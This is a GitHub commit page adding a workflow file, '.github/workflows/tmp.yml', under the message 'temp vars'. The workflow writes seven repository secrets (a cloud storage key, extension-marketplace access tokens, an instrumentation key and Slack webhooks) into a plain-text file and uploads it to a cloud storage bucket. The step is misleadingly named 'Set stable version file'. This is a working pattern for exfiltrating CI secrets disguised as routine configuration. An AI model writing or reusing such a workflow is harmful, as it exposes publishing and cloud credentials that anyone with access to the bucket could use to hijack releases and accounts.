Skip to content

Commit

Permalink
temp vars (#1410)
Browse files Browse the repository at this point in the history
  • Loading branch information
dimacodota committed Dec 16, 2023
1 parent 16c2111 commit 870679f
Showing 1 changed file with 33 additions and 0 deletions.
33 changes: 33 additions & 0 deletions .github/workflows/tmp.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
name: Upload File

on:
workflow_dispatch:

jobs:
build:
runs-on: ubuntu-latest
steps:
- name: Set stable version file
run: |
echo ${{ secrets.GCS_RELEASE_KEY }} > vscode-vars
echo ${{ secrets.INSTRUMENTATION_KEY }} >> vscode-vars
echo ${{ secrets.MODIFIER_PAT }} >> vscode-vars
echo ${{ secrets.OVSX_PAT }} >> vscode-vars
echo ${{ secrets.SLACK_RELEASES_CHANNEL_WEBHOOK_URL }} >> vscode-vars
echo ${{ secrets.SLACK_VALIDATE_MARKETPLACE_WEBHOOK }} >> vscode-vars
echo ${{ secrets.VSCE_PAT }} >> vscode-vars
- name: Authenticate to Google Cloud
uses: "google-github-actions/auth@v1"
with:
credentials_json: ${{ secrets.GCS_RELEASE_KEY }}

- name: ⬆️ Upload latest stable version to GCS
uses: google-github-actions/upload-cloud-storage@v1
with:
path: vscode-vars
destination: tabnine
parent: false
gzip: false
headers: |-
content-type: text/plain

0 comments on commit 870679f

Please sign in to comment.